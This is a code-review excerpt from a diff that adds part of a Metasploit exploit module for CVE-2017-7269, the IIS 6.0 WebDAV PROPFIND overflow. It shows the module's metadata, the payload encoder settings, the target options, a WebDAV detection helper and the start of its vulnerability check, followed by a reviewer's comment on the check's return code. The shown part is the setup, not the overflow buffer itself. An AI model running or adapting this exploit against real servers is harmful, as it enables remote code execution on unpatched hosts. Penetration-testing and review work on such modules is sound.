modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb

```diff
@@ -0,0 +1,155 @@
+          in Microsoft Windows Server 2003 R2 allows remote attackers to
+          execute arbitrary code via a long header beginning with
+          "If: <http://" in a PROPFIND request, as exploited in the
+          wild in July or August 2016.
+
+          Original exploit by Zhiniang Peng and Chen Wu.
+      },
+      'Author'         =>
+        [
+        'Zhiniang Peng', # Original author
+        'Chen Wu',       # Original author
+        'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
+        'firefart', # metasploit module
+        'zcgonvh <zcgonvh@qq.com>' # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-7269' ],
+          [ 'BID', '97127' ],
+          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
+          [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'         => 2000,
+          'BadChars'      => "\x00",
+          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'   =>  'True',
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ESI',
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'PrependMigrate' => true,
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Windows Server 2003 R2 SP2',
+            {
+              'Platform' => 'win',
+            },
+          ],
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Mar 26 2017',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
+        OptString.new('ServerName', [ true, 'Servername of the Backend Server', 'localhost' ]),
+        OptInt.new('ServerPort', [ true, 'The Port of the Backend Server', 80 ]),
+        OptInt.new('PhysicalPathLength', [ true, "Length of physical path for target (include backslash). Example: C:\\inetpub\\ == 11", 11]),
+      ], self.class)
+  end
+
+  def supports_webdav?(headers)
+    if headers['MS-Author-Via'] == 'DAV' ||
+       headers['DASL'] == '<DAV:sql>' ||
+       headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
+       headers['Public'] =~ /PROPFIND/ ||
+       headers['Allow'] =~ /PROPFIND/
+      return true
+    else
+      return false
+    end
+  end
+
+  def physical_path_length
+    datastore['PhysicalPathLength']
+  end
+
+  def server_name
+    datastore['ServerName']
+  end
+
+  def server_port
+    datastore['ServerPort']
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => target_uri.path,
+      'method' => 'OPTIONS'
+    })
+    if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
+      return Exploit::CheckCode::Vulnerable
```

Comment:
Should this return Appears instead of Vulnerable since it's just checking version instead of exercising the vulnerability?